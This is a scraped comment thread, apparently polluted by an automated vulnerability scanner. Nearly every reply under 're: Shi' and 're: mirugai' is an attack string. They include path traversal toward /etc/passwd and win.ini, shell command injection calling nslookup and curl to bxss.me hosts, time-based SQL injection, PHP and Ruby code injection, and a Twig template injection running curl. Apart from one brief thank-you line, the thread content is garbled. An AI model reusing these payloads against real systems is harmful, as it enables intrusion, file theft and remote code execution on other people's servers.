echo uupzte$()\ emacuz\nz^xyu||a #' &echo uupzte$()\ emacuz\nz^xyu||a #|" &echo uupzte$()\ emacuz\nz^xyu||a #
re: Shi
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Shi
&echo vsnqpr$()\ oobhfl\nz^xyu||a #' &echo vsnqpr$()\ oobhfl\nz^xyu||a #|" &echo vsnqpr$()\ oobhfl\nz^xyu||a #
re: Shi
/etc/passwd
re: Shi
)
re: Shi
|echo jjdzkb$()\ atkqtn\nz^xyu||a #' |echo jjdzkb$()\ atkqtn\nz^xyu||a #|" |echo jjdzkb$()\ atkqtn\nz^xyu||a #
re: Shi
%2fetc%2fpasswd
re: Shi
!(()&&!|*|*|
re: Shi
(nslookup hitfbeccsymnxa06e5.bxss.me||perl -e "gethostbyname('hitfbeccsymnxa06e5.bxss.me')")
re: Shi
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Shi
^(#$!@#$)(()))******
re: Shi
$(nslookup hitfcusbbnahd40755.bxss.me||perl -e "gethostbyname('hitfcusbbnahd40755.bxss.me')")
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Shi
&nslookup hitqxxbdppjnr516f8.bxss.me&'\"`0&nslookup hitqxxbdppjnr516f8.bxss.me&`'
re: Shi
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Shi
&(nslookup hitkpomorvuet951e6.bxss.me||perl -e "gethostbyname('hitkpomorvuet951e6.bxss.me')")&'\"`0&(nslookup hitkpomorvuet951e6.bxss.me||perl -e "gethostbyname('hitkpomorvuet951e6.bxss.me')")&`'
re: Shi
'.gethostbyname(lc('hitxp'.'mkbgehik6bf70.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(73).chr(102).chr(87).'
re: Shi
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Shi
|(nslookup hittiazqaruip98336.bxss.me||perl -e "gethostbyname('hittiazqaruip98336.bxss.me')")
re: Shi
".gethostbyname(lc("hitqc"."xaxuydsn08512.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(75).chr(120).chr(89)."
re: Shi
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Shi
`(nslookup hititwsggpctbad09b.bxss.me||perl -e "gethostbyname('hititwsggpctbad09b.bxss.me')")`
re: Shi
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Shi
file:///etc/passwd
re: Shi
;(nslookup hitdgysokzxiid3e20.bxss.me||perl -e "gethostbyname('hitdgysokzxiid3e20.bxss.me')")|(nslookup hitdgysokzxiid3e20.bxss.me||perl -e "gethostbyname('hitdgysokzxiid3e20.bxss.me')")&(nslookup hitdgysokzxiid3e20.bxss.me||perl -e "gethostbyname('hitdgysokzxiid3e20.bxss.me')")
re: Shi
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Shi
/\../\../\../\../\../\../\../etc/passwd
re: Shi
Http://bxss.me/t/fit.txt
re: Shi
HttP://bxss.me/t/xss.html?%00
re: Shi
/WEB-INF/web.xml
re: Shi
"+"A".concat(70-3).concat(22*4).concat(98).concat(71).concat(115).concat(90)+(require"socket"
Socket.gethostbyname("hitbu"+"occjtvrj66e80.bxss.me.")[3].to_s)+"
re: Shi
http://bxss.me/t/fit.txt%3F.jpg
re: Shi
bxss.me/t/xss.html?%00
re: Shi
C:\WINDOWS\system32\drivers\etc\hosts
re: Shi
'+'A'.concat(70-3).concat(22*4).concat(118).concat(81).concat(112).concat(65)+(require'socket'
Socket.gethostbyname('hitle'+'zfstyekf894c7.bxss.me.')[3].to_s)+'
re: Shi
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Shi
/etc/shells
re: Shi
../../../../../../../../../../windows/win.ini%00.jpg
re: Shi
c:/windows/win.ini
re: Shi
/../../../../../../../../../../boot.ini
re: Shi
bxss.me
re: Shi
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Shi
'"
re: Shi
..\..\..\..\..\..\..\..\windows\win.ini
re: Shi
<!--
re: Shi
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Shi
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Shi
';print(md5(31337));$a='
re: Shi
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Shi
";print(md5(31337));$a="
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Shi
${@print(md5(31337))}
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Shi
${@print(md5(31337))}\
re: Shi
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Shi
'.print(md5(31337)).'
re: Shi
WEB-INF/web.xml
re: Shi
WEB-INF\web.xml
re: Shi
1D2F266XP0
re: Shi
response.write(9571365*9420370)
re: Shi
'+response.write(9571365*9420370)+'
re: Shi
"+response.write(9571365*9420370)+"
re: Shi
../../../../../../../../../../../../../../etc/passwd
re: Shi
../../../../../../../../../../../../../../windows/win.ini
re: Shi
<esi:include src="http://bxss.me/rpb.png"/>
re: Shi
file:///etc/passwd
re: Shi
${10000049+10000285}
re: Shi
../
re: Shi
)
re: Shi
!(()&&!|*|*|
re: Shi
redirtest.acx
re: Shi
^(#$!@#$)(()))******
re: Shi
echo onrket$()\ nkwstj\nz^xyu||a #' &echo onrket$()\ nkwstj\nz^xyu||a #|" &echo onrket$()\ nkwstj\nz^xyu||a #
re: Shi
&echo skjazi$()\ grupki\nz^xyu||a #' &echo skjazi$()\ grupki\nz^xyu||a #|" &echo skjazi$()\ grupki\nz^xyu||a #
re: Shi
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Shi
'.gethostbyname(lc('hitzc'.'wnoayqjpf5654.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(71).chr(104).chr(79).'
re: Shi
|echo ndyjio$()\ sarqwj\nz^xyu||a #' |echo ndyjio$()\ sarqwj\nz^xyu||a #|" |echo ndyjio$()\ sarqwj\nz^xyu||a #
re: Shi
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Shi
".gethostbyname(lc("hitqu"."rxwwjzwaa87ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(83).chr(111).chr(83)."
re: Shi
expr 9000358441 - 954852
re: Shi
/etc/shells
re: Shi
gethostbyname(lc('hithf'.'ysftjnvm68a4e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(81).chr(99).chr(86)
re: Shi
(nslookup -q=cname hitixwgqfmtlf42114.bxss.me||curl hitixwgqfmtlf42114.bxss.me))
re: Shi
../../../../../../../../../../../../../../etc/shells
re: Shi
$(nslookup -q=cname hitfcwltqggzy7cdf1.bxss.me||curl hitfcwltqggzy7cdf1.bxss.me)
re: Shi
c:/windows/win.ini
re: Shi
&nslookup -q=cname hithtxaivbioi37562.bxss.me&'\"`0&nslookup -q=cname hithtxaivbioi37562.bxss.me&`'
re: Shi
bxss.me
re: Shi
&(nslookup -q=cname hitxsfcmbzzlsb213c.bxss.me||curl hitxsfcmbzzlsb213c.bxss.me)&'\"`0&(nslookup -q=cname hitxsfcmbzzlsb213c.bxss.me||curl hitxsfcmbzzlsb213c.bxss.me)&`'
re: Shi
Http://bxss.me/t/fit.txt
re: Shi
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Shi
|(nslookup -q=cname hitiqmevgffjt7e049.bxss.me||curl hitiqmevgffjt7e049.bxss.me)
re: Shi
http://bxss.me/t/fit.txt?.jpg
re: Shi
`(nslookup -q=cname hityuwujaslii7b3e4.bxss.me||curl hityuwujaslii7b3e4.bxss.me)`
re: Shi
;(nslookup -q=cname hitmrzopwcxzrad811.bxss.me||curl hitmrzopwcxzrad811.bxss.me)|(nslookup -q=cname hitmrzopwcxzrad811.bxss.me||curl hitmrzopwcxzrad811.bxss.me)&(nslookup -q=cname hitmrzopwcxzrad811.bxss.me||curl hitmrzopwcxzrad811.bxss.me)
re: Shi
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Shi
|(nslookup${IFS}-q${IFS}cname${IFS}hiturgkeclwjkc4a55.bxss.me||curl${IFS}hiturgkeclwjkc4a55.bxss.me)
re: Shi
';print(md5(31337));$a='
re: Shi
&(nslookup${IFS}-q${IFS}cname${IFS}hitpyuamnucvf7e467.bxss.me||curl${IFS}hitpyuamnucvf7e467.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpyuamnucvf7e467.bxss.me||curl${IFS}hitpyuamnucvf7e467.bxss.me)&`'
re: Shi
";print(md5(31337));$a="
re: Shi
${@print(md5(31337))}
re: Shi
${@print(md5(31337))}\
re: Shi
'"()
re: Shi
'.print(md5(31337)).'
re: Shi
'&&sleep(27*1000)*ulyhpz&&'
re: Shi
"&&sleep(27*1000)*pqjimi&&"
re: Shi
'||sleep(27*1000)*lelaff||'
re: Shi
HttP://bxss.me/t/xss.html?%00
re: Shi
"||sleep(27*1000)*pbvkae||"
re: Shi
bxss.me/t/xss.html?%00
re: Shi
"+"A".concat(70-3).concat(22*4).concat(106).concat(79).concat(122).concat(87)+(require"socket"
Socket.gethostbyname("hitxt"+"jxqqrywzed406.bxss.me.")[3].to_s)+"
re: Shi
'+'A'.concat(70-3).concat(22*4).concat(101).concat(72).concat(117).concat(85)+(require'socket'
Socket.gethostbyname('hitnc'+'ywsstski5b239.bxss.me.')[3].to_s)+'
re: Shi
'A'.concat(70-3).concat(22*4).concat(116).concat(90).concat(119).concat(89)+(require'socket'
Socket.gethostbyname('hitcf'+'kxvvjutz6fec2.bxss.me.')[3].to_s)
re: Shi
replies
re: Shi
replies�
re: Shi
replies/.
re: Shi
'"
re: Shi
<!--
re: Shi
'"()&%<zzz><ScRiPt >kEbK(9136)</ScRiPt>
re: Shi
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitwsgwonblyh54487.bxss.me")}}
re: Shi
'"()&%<zzz><ScRiPt >kEbK(9426)</ScRiPt>
re: Shi
9903697
re: Shi
wqaseFCn
re: Shi
*1
re: Shi
*1
re: Shi
*1
re: Shi
*1
re: Shi
-1 OR 5*5=25 --
re: Shi
-1 OR 5*5=26 --
re: Shi
-1 OR 5*5=25
re: Shi
-1 OR 5*5=26
re: Shi
*if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
-1 waitfor delay '0:0:15' --
re: Shi
3S5M7o4q'; waitfor delay '0:0:15' --
re: Shi
-1 OR 226=(SELECT 226 FROM PG_SLEEP(15))--
re: Shi
-1) OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 518=(SELECT 518 FROM PG_SLEEP(15))--
re: Shi
ZUa7e3Y4' OR 939=(SELECT 939 FROM PG_SLEEP(15))--
re: Shi
Py0rOgmS') OR 155=(SELECT 155 FROM PG_SLEEP(15))--
re: Shi
ilpZMzaz')) OR 910=(SELECT 910 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
'"
re: Shi
@@IZSHO
re: Shi
(select 198766*667891)
re: Shi
(select 198766*667891 from DUAL)
Glad to be able to support after all the interesting discussions and posts I've enjoyed here over the last few years! Looking forward to chatting here.
re: mirugai
QNPPgGrd
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+69-69-1=0+0+0+1
re: mirugai
-1 OR 3+69-69-1=0+0+0+1
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
BR90Mi52'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 547=(SELECT 547 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 153=(SELECT 153 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 441=(SELECT 441 FROM PG_SLEEP(15))--
re: mirugai
DRyiZJ2U' OR 335=(SELECT 335 FROM PG_SLEEP(15))--
re: mirugai
esDrE7tQ') OR 131=(SELECT 131 FROM PG_SLEEP(15))--
re: mirugai
bxXCP0BK')) OR 564=(SELECT 564 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@F4LZs
re: mirugai
1CrKqEyB4YO
re: mirugai
response.write(9207850*9825102)
re: mirugai
%0abcc:074625.67-22328.67.c20d8.19990.2@bxss.me
re: mirugai
'+response.write(9207850*9825102)+'
re: mirugai
to@example.com>%0d%0abcc:074625.67-22329.67.c20d8.19990.2@bxss.me
re: mirugai
"+response.write(9207850*9825102)+"
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
${9999084+9999423}
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
../../../../../../../../../../../../../../../proc/version
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: mirugai
../../../../../../../../../../etc/passwd%00.jpg
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: mirugai
)
re: mirugai
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: mirugai
!(()&&!|*|*|
re: mirugai
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: mirugai
'.gethostbyname(lc('hitfc'.'cokxxqos315f0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(80).chr(103).chr(66).'
re: mirugai
^(#$!@#$)(()))******
re: mirugai
/etc/passwd
re: mirugai
".gethostbyname(lc("hitzj"."aalvguon12bbd.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(71).chr(121).chr(71)."
re: mirugai
echo fglofw$()\ bbgagh\nz^xyu||a #' &echo fglofw$()\ bbgagh\nz^xyu||a #|" &echo fglofw$()\ bbgagh\nz^xyu||a #
re: mirugai
%2fetc%2fpasswd
re: mirugai
&echo phdzky$()\ bgpwnn\nz^xyu||a #' &echo phdzky$()\ bgpwnn\nz^xyu||a #|" &echo phdzky$()\ bgpwnn\nz^xyu||a #
re: mirugai
/.././.././.././.././.././.././.././../etc/./passwd%00
re: mirugai
|echo swbswc$()\ uagemw\nz^xyu||a #' |echo swbswc$()\ uagemw\nz^xyu||a #|" |echo swbswc$()\ uagemw\nz^xyu||a #
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: mirugai
(nslookup hitmholdflzdhc4a00.bxss.me||perl -e "gethostbyname('hitmholdflzdhc4a00.bxss.me')")
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: mirugai
$(nslookup hitwfslvoguni0a619.bxss.me||perl -e "gethostbyname('hitwfslvoguni0a619.bxss.me')")
re: mirugai
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: mirugai
&nslookup hitfebaxwpztobb09b.bxss.me&'\"`0&nslookup hitfebaxwpztobb09b.bxss.me&`'
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: mirugai
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
&(nslookup hittowsqssbqa64217.bxss.me||perl -e "gethostbyname('hittowsqssbqa64217.bxss.me')")&'\"`0&(nslookup hittowsqssbqa64217.bxss.me||perl -e "gethostbyname('hittowsqssbqa64217.bxss.me')")&`'
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: mirugai
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(120).concat(66).concat(118).concat(69)+(require"socket"
